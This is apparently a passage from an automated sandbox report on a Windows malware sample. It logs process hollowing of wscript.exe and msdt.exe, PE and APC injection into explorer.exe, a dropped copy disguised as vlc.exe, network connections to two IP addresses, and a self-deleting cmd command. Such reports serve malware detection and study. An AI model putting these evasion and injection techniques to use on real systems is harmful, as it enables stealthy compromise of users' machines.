          Source: C:\Users\user\Desktop\SecuriteInfo.com.Generic.mg.7e26e87ab642008d.exeCode function: 1_2_0140B433 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Generic.mg.7e26e87ab642008d.exeCode function: 1_2_0140B433 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Generic.mg.7e26e87ab642008d.exeCode function: 1_2_0140B433 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Generic.mg.7e26e87ab642008d.exeCode function: 1_2_0142CCC0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Generic.mg.7e26e87ab642008d.exeCode function: 1_2_0142CCC0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Generic.mg.7e26e87ab642008d.exeCode function: 1_2_0142CCC0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Generic.mg.7e26e87ab642008d.exeCode function: 1_2_0142CCC0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Generic.mg.7e26e87ab642008d.exeCode function: 1_2_013F4CB0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Generic.mg.7e26e87ab642008d.exeCode function: 1_2_014C8CD6 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Generic.mg.7e26e87ab642008d.exeCode function: 1_2_014284E0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Generic.mg.7e26e87ab642008d.exeCode function: 1_2_014284E0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Generic.mg.7e26e87ab642008d.exeCode function: 1_2_014284E0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Generic.mg.7e26e87ab642008d.exeCode function: 1_2_014284E0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Generic.mg.7e26e87ab642008d.exeCode function: 1_2_014284E0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Generic.mg.7e26e87ab642008d.exeCode function: 1_2_014284E0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Generic.mg.7e26e87ab642008d.exeCode function: 1_2_013F649B mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Generic.mg.7e26e87ab642008d.exeCode function: 1_2_013F649B mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Generic.mg.7e26e87ab642008d.exeCode function: 1_2_014B14FB mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Generic.mg.7e26e87ab642008d.exeCode function: 1_2_01476CF0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Generic.mg.7e26e87ab642008d.exeCode function: 1_2_01476CF0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Generic.mg.7e26e87ab642008d.exeCode function: 1_2_01476CF0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Generic.mg.7e26e87ab642008d.exeCode function: 1_2_013F1480 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Generic.mg.7e26e87ab642008d.exeCode function: 1_2_0140849B mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Generic.mg.7e26e87ab642008d.exeCode function: 1_2_014B4496 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Generic.mg.7e26e87ab642008d.exeCode function: 1_2_014B4496 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Generic.mg.7e26e87ab642008d.exeCode function: 1_2_014B4496 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Generic.mg.7e26e87ab642008d.exeCode function: 1_2_014B4496 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Generic.mg.7e26e87ab642008d.exeProcess token adjusted: Debug
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\VideoLAN\vlc.exeProcess token adjusted: Debug
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\VideoLAN\vlc.exeProcess token adjusted: Debug
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\VideoLAN\vlc.exeProcess token adjusted: Debug
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\VideoLAN\vlc.exeProcess token adjusted: Debug
          Source: C:\Windows\SysWOW64\msdt.exeProcess token adjusted: Debug
          Source: C:\Windows\SysWOW64\wscript.exeProcess token adjusted: Debug
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Generic.mg.7e26e87ab642008d.exeMemory allocated: page read and write | page guard

          HIPS / PFW / Operating System Protection Evasion:

          barindex
          System process connects to network (likely due to code injection or exploit)Show sources
          Source: C:\Windows\explorer.exeNetwork Connect: 52.58.78.16 80
          Source: C:\Windows\explorer.exeNetwork Connect: 74.208.236.113 80
          Injects a PE file into a foreign processesShow sources
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Generic.mg.7e26e87ab642008d.exeMemory written: C:\Users\user\Desktop\SecuriteInfo.com.Generic.mg.7e26e87ab642008d.exe base: 400000 value starts with: 4D5A
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\VideoLAN\vlc.exeMemory written: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\VideoLAN\vlc.exe base: 400000 value starts with: 4D5A
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\VideoLAN\vlc.exeMemory written: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\VideoLAN\vlc.exe base: 400000 value starts with: 4D5A
          Maps a DLL or memory area into another processShow sources
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\VideoLAN\vlc.exeSection loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\VideoLAN\vlc.exeSection loaded: unknown target: C:\Windows\SysWOW64\wscript.exe protection: execute and read and write
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\VideoLAN\vlc.exeSection loaded: unknown target: C:\Windows\SysWOW64\wscript.exe protection: execute and read and write
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\VideoLAN\vlc.exeSection loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\VideoLAN\vlc.exeSection loaded: unknown target: C:\Windows\SysWOW64\msdt.exe protection: execute and read and write
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\VideoLAN\vlc.exeSection loaded: unknown target: C:\Windows\SysWOW64\msdt.exe protection: execute and read and write
          Source: C:\Windows\SysWOW64\msdt.exeSection loaded: unknown target: C:\Windows\explorer.exe protection: read write
          Source: C:\Windows\SysWOW64\msdt.exeSection loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write
          Modifies the context of a thread in another process (thread injection)Show sources
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\VideoLAN\vlc.exeThread register set: target process: 3440
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\VideoLAN\vlc.exeThread register set: target process: 3440
          Source: C:\Windows\SysWOW64\msdt.exeThread register set: target process: 3440
          Queues an APC in another process (thread injection)Show sources
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\VideoLAN\vlc.exeThread APC queued: target process: C:\Windows\explorer.exe
          Sample uses process hollowing techniqueShow sources
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\VideoLAN\vlc.exeSection unmapped: C:\Windows\SysWOW64\wscript.exe base address: 12E0000
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\VideoLAN\vlc.exeSection unmapped: C:\Windows\SysWOW64\msdt.exe base address: 920000
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Generic.mg.7e26e87ab642008d.exeProcess created: C:\Users\user\Desktop\SecuriteInfo.com.Generic.mg.7e26e87ab642008d.exe C:\Users\user\Desktop\SecuriteInfo.com.Generic.mg.7e26e87ab642008d.exe
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\VideoLAN\vlc.exeProcess created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\VideoLAN\vlc.exe C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\VideoLAN\vlc.exe
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\VideoLAN\vlc.exeProcess created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\VideoLAN\vlc.exe C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\VideoLAN\vlc.exe
          Source: C:\Windows\SysWOW64\msdt.exeProcess created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\VideoLAN\vlc.exe'
          Source: explorer.exe, 00000007.00000000.397942055.0000000000EE0000.00000002.00000001.sdmp, msdt.exe, 0000000C.00000002.603804424.0000000003720000.00000002.00000001.sdmpBinary or memory string: Shell_TrayWnd
          Source: explorer.exe, 00000007.00000002.602553124.00000000008B8000.00000004.00000020.sdmp, msdt.exe, 0000000C.00000002.603804424.0000000003720000.00000002.00000001.sdmpBinary or memory string: Progman
          Source: explorer.exe, 00000007.00000000.397942055.0000000000EE0000.00000002.00000001.sdmp, msdt.exe, 0000000C.00000002.603804424.0000000003720000.00000002.00000001.sdmpBinary or memory string: &Program Manager
          Source: explorer.exe, 00000007.00000000.397942055.0000000000EE0000.00000002.00000001.sdmp, msdt.exe, 0000000C.00000002.603804424.0000000003720000.00000002.00000001.sdmpBinary or memory string: Progmanlock
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Generic.mg.7e26e87ab642008d.exeQueries volume information: C:\Users\user\Desktop\SecuriteInfo.com.Generic.mg.7e26e87ab642008d.exe VolumeInformation
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Generic.mg.7e26e87ab642008d.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Generic.mg.7e26e87ab642008d.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Generic.mg.7e26e87ab642008d.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Generic.mg.7e26e87ab642008d.exeQueries volume information: C:\Windows\Fonts\arial.ttf VolumeInformation
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Generic.mg.7e26e87ab642008d.exeQueries volume information: C:\Windows\Fonts\ariali.ttf VolumeInformation
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Generic.mg.7e26e87ab642008d.exeQueries volume information: C:\Windows\Fonts\arialbd.ttf VolumeInformation
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Generic.mg.7e26e87ab642008d.exeQueries volume information: C:\Windows\Fonts\arialbi.ttf VolumeInformation
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Generic.mg.7e26e87ab642008d.exeQueries volume information: C:\Windows\Fonts\ARIALN.TTF VolumeInformation
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Generic.mg.7e26e87ab642008d.exeQueries volume information: C:\Windows\Fonts\ariblk.ttf VolumeInformation
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Generic.mg.7e26e87ab642008d.exeQueries volume information: C:\Windows\Fonts\ARIALNI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Generic.mg.7e26e87ab642008d.exeQueries volume information: C:\Windows\Fonts\ARIALNB.TTF VolumeInformation
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Generic.mg.7e26e87ab642008d.exeQueries volume information: C:\Windows\Fonts\ARIALNBI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Generic.mg.7e26e87ab642008d.exeQueries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformation
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Generic.mg.7e26e87ab642008d.exeQueries volume information: C:\Windows\Fonts\calibri.ttf VolumeInformation
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Generic.mg.7e26e87ab642008d.exeQueries volume information: C:\Windows\Fonts\calibril.ttf VolumeInformation
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Generic.mg.7e26e87ab642008d.exeQueries volume information: C:\Windows\Fonts\calibrii.ttf VolumeInformation
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Generic.mg.7e26e87ab642008d.exeQueries volume information: C:\Windows\Fonts\calibrili.ttf VolumeInformation
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Generic.mg.7e26e87ab642008d.exeQueries volume information: C:\Windows\Fonts\calibrib.ttf VolumeInformation
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Generic.mg.7e26e87ab642008d.exeQueries volume information: C:\Windows\Fonts\calibriz.ttf VolumeInformation
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Generic.mg.7e26e87ab642008d.exeQueries volume information: C:\Windows\Fonts\cambria.ttc VolumeInformation
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Generic.mg.7e26e87ab642008d.exeQueries volume information: C:\Windows\Fonts\cambriai.ttf VolumeInformation
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Generic.mg.7e26e87ab642008d.exeQueries volume information: C:\Windows\Fonts\cambriab.ttf VolumeInformation
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Generic.mg.7e26e87ab642008d.exeQueries volume information: C:\Windows\Fonts\cambriaz.ttf VolumeInformation
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Generic.mg.7e26e87ab642008d.exeQueries volume information: C:\Windows\Fonts\Candara.ttf VolumeInformation
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Generic.mg.7e26e87ab642008d.exeQueries volume information: C:\Windows\Fonts\Candarai.ttf VolumeInformation
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Generic.mg.7e26e87ab642008d.exeQueries volume information: C:\Windows\Fonts\Candarab.ttf VolumeInformation
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Generic.mg.7e26e87ab642008d.exeQueries volume information: C:\Windows\Fonts\Candaraz.ttf VolumeInformation
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Generic.mg.7e26e87ab642008d.exeQueries volume information: C:\Windows\Fonts\comic.ttf VolumeInformation
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Generic.mg.7e26e87ab642008d.exeQueries volume information: C:\Windows\Fonts\comici.ttf VolumeInformation
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Generic.mg.7e26e87ab642008d.exeQueries volume information: C:\Windows\Fonts\comicbd.ttf VolumeInformation
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Generic.mg.7e26e87ab642008d.exeQueries volume information: C:\Windows\Fonts\comicz.ttf VolumeInformation
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Generic.mg.7e26e87ab642008d.exeQueries volume information: C:\Windows\Fonts\consola.ttf VolumeInformation
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Generic.mg.7e26e87ab642008d.exeQueries volume information: C:\Windows\Fonts\consolai.ttf VolumeInformation
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Generic.mg.7e26e87ab642008d.exeQueries volume information: C:\Windows\Fonts\consolab.ttf VolumeInformation
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Generic.mg.7e26e87ab642008d.exeQueries volume information: C:\Windows\Fonts\consolaz.ttf VolumeInformation
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Generic.mg.7e26e87ab642008d.exeQueries volume information: C:\Windows\Fonts\constan.ttf VolumeInformation
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Generic.mg.7e26e87ab642008d.exeQueries volume information: C:\Windows\Fonts\constani.ttf VolumeInformation
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Generic.mg.7e26e87ab642008d.exeQueries volume information: C:\Windows\Fonts\constanb.ttf VolumeInformation
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Generic.mg.7e26e87ab642008d.exeQueries volume information: C:\Windows\Fonts\constanz.ttf VolumeInformation
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Generic.mg.7e26e87ab642008d.exeQueries volume information: C:\Windows\Fonts\corbel.ttf VolumeInformation
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Generic.mg.7e26e87ab642008d.exeQueries volume information: C:\Windows\Fonts\corbeli.ttf VolumeInformation
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Generic.mg.7e26e87ab642008d.exeQueries volume information: C:\Windows\Fonts\corbelb.ttf VolumeInformation
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Generic.mg.7e26e87ab642008d.exeQueries volume information: C:\Windows\Fonts\corbelz.ttf VolumeInformation
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Generic.mg.7e26e87ab642008d.exeQueries volume information: C:\Windows\Fonts\cour.ttf VolumeInformation
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Generic.mg.7e26e87ab642008d.exeQueries volume information: C:\Windows\Fonts\couri.ttf VolumeInformation
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Generic.mg.7e26e87ab642008d.exeQueries volume information: C:\Windows\Fonts\courbd.ttf VolumeInformation
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Generic.mg.7e26e87ab642008d.exeQueries volume information: C:\Windows\Fonts\courbi.ttf VolumeInformation
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Generic.mg.7e26e87ab642008d.exeQueries volume information: C:\Windows\Fonts\ebrima.ttf VolumeInformation
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Generic.mg.7e26e87ab642008d.exeQueries volume information: C:\Windows\Fonts\ebrimabd.ttf VolumeInformation
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Generic.mg.7e26e87ab642008d.exeQueries volume information: C:\Windows\Fonts\framd.ttf VolumeInformation
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Generic.mg.7e26e87ab642008d.exeQueries volume information: C:\Windows\Fonts\FRADM.TTF VolumeInformation
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Generic.mg.7e26e87ab642008d.exeQueries volume information: C:\Windows\Fonts\framdit.ttf VolumeInformation
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Generic.mg.7e26e87ab642008d.exeQueries volume information: C:\Windows\Fonts\FRADMIT.TTF VolumeInformation
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Generic.mg.7e26e87ab642008d.exeQueries volume information: C:\Windows\Fonts\FRAMDCN.TTF VolumeInformation
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Generic.mg.7e26e87ab642008d.exeQueries volume information: C:\Windows\Fonts\FRADMCN.TTF VolumeInformation
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Generic.mg.7e26e87ab642008d.exeQueries volume information: C:\Windows\Fonts\FRAHV.TTF VolumeInformation
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Generic.mg.7e26e87ab642008d.exeQueries volume information: C:\Windows\Fonts\FRAHVIT.TTF VolumeInformation
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Generic.mg.7e26e87ab642008d.exeQueries volume information: C:\Windows\Fonts\Gabriola.ttf VolumeInformation
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Generic.mg.7e26e87ab642008d.exeQueries volume information: C:\Windows\Fonts\gadugi.ttf VolumeInformation
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Generic.mg.7e26e87ab642008d.exeQueries volume information: C:\Windows\Fonts\gadugib.ttf VolumeInformation
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Generic.mg.7e26e87ab642008d.exeQueries volume information: C:\Windows\Fonts\georgia.ttf VolumeInformation
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Generic.mg.7e26e87ab642008d.exeQueries volume information: C:\Windows\Fonts\georgiai.ttf VolumeInformation
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Generic.mg.7e26e87ab642008d.exeQueries volume information: C:\Windows\Fonts\georgiab.ttf VolumeInformation
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Generic.mg.7e26e87ab642008d.exeQueries volume information: C:\Windows\Fonts\georgiaz.ttf VolumeInformation
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Generic.mg.7e26e87ab642008d.exeQueries volume information: C:\Windows\Fonts\impact.ttf VolumeInformation
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Generic.mg.7e26e87ab642008d.exeQueries volume information: C:\Windows\Fonts\Inkfree.ttf VolumeInformation
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Generic.mg.7e26e87ab642008d.exeQueries volume information: C:\Windows\Fonts\javatext.ttf VolumeInformation
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Generic.mg.7e26e87ab642008d.exeQueries volume information: C:\Windows\Fonts\LeelawUI.ttf VolumeInformation
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Generic.mg.7e26e87ab642008d.exeQueries volume information: C:\Windows\Fonts\LeelUIsl.ttf VolumeInformation
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Generic.mg.7e26e87ab642008d.exeQueries volume information: C:\Windows\Fonts\LeelaUIb.ttf VolumeInformation
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Generic.mg.7e26e87ab642008d.exeQueries volume information: C:\Windows\Fonts\lucon.ttf VolumeInformation
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Generic.mg.7e26e87ab642008d.exeQueries volume information: C:\Windows\Fonts\l_10646.ttf VolumeInformation
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Generic.mg.7e26e87ab642008d.exeQueries volume information: C:\Windows\Fonts\malgun.ttf VolumeInformation
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Generic.mg.7e26e87ab642008d.exeQueries volume information: C:\Windows\Fonts\malgunsl.ttf VolumeInformation
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Generic.mg.7e26e87ab642008d.exeQueries volume information: C:\Windows\Fonts\malgunbd.ttf VolumeInformation
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Generic.mg.7e26e87ab642008d.exeQueries volume information: C:\Windows\Fonts\himalaya.ttf VolumeInformation
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Generic.mg.7e26e87ab642008d.exeQueries volume information: C:\Windows\Fonts\msjh.ttc VolumeInformation
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Generic.mg.7e26e87ab642008d.exeQueries volume information: C:\Windows\Fonts\msjhl.ttc VolumeInformation
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Generic.mg.7e26e87ab642008d.exeQueries volume information: C:\Windows\Fonts\msjhbd.ttc VolumeInformation
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Generic.mg.7e26e87ab642008d.exeQueries volume information: C:\Windows\Fonts\ntailu.ttf VolumeInformation
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Generic.mg.7e26e87ab642008d.exeQueries volume information: C:\Windows\Fonts\ntailub.ttf VolumeInformation
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Generic.mg.7e26e87ab642008d.exeQueries volume information: C:\Windows\Fonts\phagspa.ttf VolumeInformation
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Generic.mg.7e26e87ab642008d.exeQueries volume information: C:\Windows\Fonts\phagspab.ttf VolumeInformation
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Generic.mg.7e26e87ab642008d.exeQueries volume information: C:\Windows\Fonts\micross.ttf VolumeInformation
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Generic.mg.7e26e87ab642008d.exeQueries volume information: C:\Windows\Fonts\taile.ttf VolumeInformation
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Generic.mg.7e26e87ab642008d.exeQueries volume information: C:\Windows\Fonts\taileb.ttf VolumeInformation
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Generic.mg.7e26e87ab642008d.exeQueries volume information: C:\Windows\Fonts\msyh.ttc VolumeInformation
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Generic.mg.7e26e87ab642008d.exeQueries volume information: C:\Windows\Fonts\msyhl.ttc VolumeInformation
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Generic.mg.7e26e87ab642008d.exeQueries volume information: C:\Windows\Fonts\msyhbd.ttc VolumeInformation
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Generic.mg.7e26e87ab642008d.exeQueries volume information: C:\Windows\Fonts\msyi.ttf VolumeInformation
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Generic.mg.7e26e87ab642008d.exeQueries volume information: C:\Windows\Fonts\mingliub.ttc VolumeInformation
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Generic.mg.7e26e87ab642008d.exeQueries volume information: C:\Windows\Fonts\monbaiti.ttf VolumeInformation
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Generic.mg.7e26e87ab642008d.exeQueries volume information: C:\Windows\Fonts\msgothic.ttc VolumeInformation
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Generic.mg.7e26e87ab642008d.exeQueries volume information: C:\Windows\Fonts\mvboli.ttf VolumeInformation
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Generic.mg.7e26e87ab642008d.exeQueries volume information: C:\Windows\Fonts\mmrtext.ttf VolumeInformation
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Generic.mg.7e26e87ab642008d.exeQueries volume information: C:\Windows\Fonts\mmrtextb.ttf VolumeInformation
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Generic.mg.7e26e87ab642008d.exeQueries volume information: C:\Windows\Fonts\Nirmala.ttf VolumeInformation
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Generic.mg.7e26e87ab642008d.exeQueries volume information: C:\Windows\Fonts\NirmalaS.ttf VolumeInformation
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Generic.mg.7e26e87ab642008d.exeQueries volume information: C:\Windows\Fonts\NirmalaB.ttf VolumeInformation
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Generic.mg.7e26e87ab642008d.exeQueries volume information: C:\Windows\Fonts\pala.ttf VolumeInformation
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Generic.mg.7e26e87ab642008d.exeQueries volume information: C:\Windows\Fonts\palai.ttf VolumeInformation
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Generic.mg.7e26e87ab642008d.exeQueries volume information: C:\Windows\Fonts\palab.ttf VolumeInformation
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Generic.mg.7e26e87ab642008d.exeQueries volume information: C:\Windows\Fonts\palabi.ttf VolumeInformation
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Generic.mg.7e26e87ab642008d.exeQueries volume information: C:\Windows\Fonts\segoepr.ttf VolumeInformation
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Generic.mg.7e26e87ab642008d.exeQueries volume information: C:\Windows\Fonts\segoeprb.ttf VolumeInformation
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Generic.mg.7e26e87ab642008d.exeQueries volume information: C:\Windows\Fonts\segoesc.ttf VolumeInformation
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Generic.mg.7e26e87ab642008d.exeQueries volume information: C:\Windows\Fonts\segoescb.ttf VolumeInformation
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Generic.mg.7e26e87ab642008d.exeQueries volume information: C:\Windows\Fonts\seguiemj.ttf VolumeInformation
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Generic.mg.7e26e87ab642008d.exeQueries volume information: C:\Windows\Fonts\seguihis.ttf VolumeInformation
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Generic.mg.7e26e87ab642008d.exeQueries volume information: C:\Windows\Fonts\seguisym.ttf VolumeInformation
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Generic.mg.7e26e87ab642008d.exeQueries volume information: C:\Windows\Fonts\simsun.ttc VolumeInformation
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Generic.mg.7e26e87ab642008d.exeQueries volume information: C:\Windows\Fonts\simsunb.ttf VolumeInformation
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Generic.mg.7e26e87ab642008d.exeQueries volume information: C:\Windows\Fonts\Sitka.ttc VolumeInformation
